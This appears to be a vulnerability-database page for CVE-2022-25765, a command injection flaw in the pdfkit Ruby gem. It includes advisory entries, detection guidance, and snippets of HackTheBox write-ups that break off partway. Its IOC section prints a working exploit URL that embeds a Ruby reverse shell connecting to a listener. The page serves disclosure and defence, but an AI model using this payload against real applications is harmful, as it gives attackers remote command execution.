CVE-2022-25765
published 2022-09-09CVE-2022-25765: The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.
PriorityP275critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
38.92%
98.4th percentile
The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| pdfkit_project | pdfkit | >= 0 < 0.8.7.2 | 0.8.7.2 |
| pdfkit_project | pdfkit | >= 0.0.0 < unspecified | unspecified |
| pdfkit_project | pdfkit | >= 0.0.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandhttp://%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("{listenIP}","{listenPort}"))'`↗
- ·The vulnerability affects all pdfkit versions from 0.0.0 through 0.8.7.2; the exploit was specifically tested on pdfkit 0.8.6, so detection rules should cover the full version range. ↗
- ·The default POST parameter targeted by the exploit is `url`; applications may use different parameter names, requiring tunable detection rules. ↗
- ·The injection requires the URL to contain a space encoded as `%20` immediately before the backtick-wrapped command; URL-decoding must be applied before pattern matching in WAF/IDS rules. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
PDFKit vulnerable to Command Injection
ghsa·2022-09-10
CVE-2022-25765 [CRITICAL] CWE-77 PDFKit vulnerable to Command Injection
PDFKit vulnerable to Command Injection
The package pdfkit is vulnerable to Command Injection where the URL is not properly sanitized.
Note: This issue was patched in 0.8.7.2, but the patch was discovered to be ineffective. The updated patch version is 0.8.7.2.
OSV
PDFKit vulnerable to Command Injection
osv·2022-09-10
CVE-2022-25765 [CRITICAL] PDFKit vulnerable to Command Injection
PDFKit vulnerable to Command Injection
The package pdfkit is vulnerable to Command Injection where the URL is not properly sanitized.
Note: This issue was patched in 0.8.7.2, but the patch was discovered to be ineffective. The updated patch version is 0.8.7.2.
No detection rules found.
CTF
medium / README
ctf_writeups·CVSS 9.1
[CRITICAL] medium / README
---
layout: default
title: Medium Machines
parent: Machines
nav_order: 2
description: "112+ Medium HTB machine writeups with walkthroughs"
permalink: /machines/medium/
---
# HackTheBox - Medium Machines
> Comprehensive index of retired HTB Medium-difficulty machines with key techniques and attack path summaries.
**Total: 100+ machines** | Sorted roughly by retirement date (newest first)
---
## Machine Index
| # | Machine | OS | Key Techniques | Attack Path Summary | Writeup |
|---|---------|-----|----------------|---------------------|---------|
| 1 | Signed | Linux | Code Signing Bypass, Certificate Abuse | Forge code signature to deploy malicious update, escalate via trusted binary execution | [0xdf](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) |
| 2 | Voleur | Linux | Data E
CTF
Precious / README
ctf_writeups·CVSS 7.3
[HIGH] Precious / README
# Precious
> Write-up author: jon-brandy
## DESCRIPTION:
- NONE
## HINT:
- NONE
## STEPS:
1. First, let's run nmap to check if there are any ports open.
> RESULT
2. Notice the machines seems running a web application, let's open the host on the web browser.
> RESULT
3. Let's enter `http://google.com`.
> RESULT
4. Already tried to enter my own ip but didn't get any pdf.
5. Let's serve http on port 8000 first.
> RESULT
6. Great! We got it.
7. Check the meta data, to see if we can grab any clue.
> RESULT
8. Notice the version of pdfkit is outdated and it's vulnerable.
> WRITTEN IN CVE MITRE
```
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25765
```
9. Hence i did a small outsource about the approach they used for this vuln, found this link.
```
https://security.s
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
http://packetstormsecurity.com/files/171746/pdfkit-0.8.7.2-Command-Injection.htmlhttps://github.com/pdfkit/pdfkit/blob/46cdf53ec540da1a1a2e4da979e3e5fe2f92a257/lib/pdfkit/pdfkit.rb%23L55-L58https://github.com/pdfkit/pdfkit/blob/master/lib/pdfkit/source.rb%23L44-L50https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C36GAV3TKM3JXV6UVMLMTTDRCPKSNETQ/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ESWB6SX7HYWQ54UGBGQOZ7G24O6RAOKD/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JFB2BFKH5SUGRKXMY6PWRQNGKZML7GDT/https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795http://packetstormsecurity.com/files/171746/pdfkit-0.8.7.2-Command-Injection.htmlhttps://github.com/pdfkit/pdfkit/blob/46cdf53ec540da1a1a2e4da979e3e5fe2f92a257/lib/pdfkit/pdfkit.rb%23L55-L58https://github.com/pdfkit/pdfkit/blob/master/lib/pdfkit/source.rb%23L44-L50https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C36GAV3TKM3JXV6UVMLMTTDRCPKSNETQ/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ESWB6SX7HYWQ54UGBGQOZ7G24O6RAOKD/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JFB2BFKH5SUGRKXMY6PWRQNGKZML7GDT/https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
2022-09-09
Published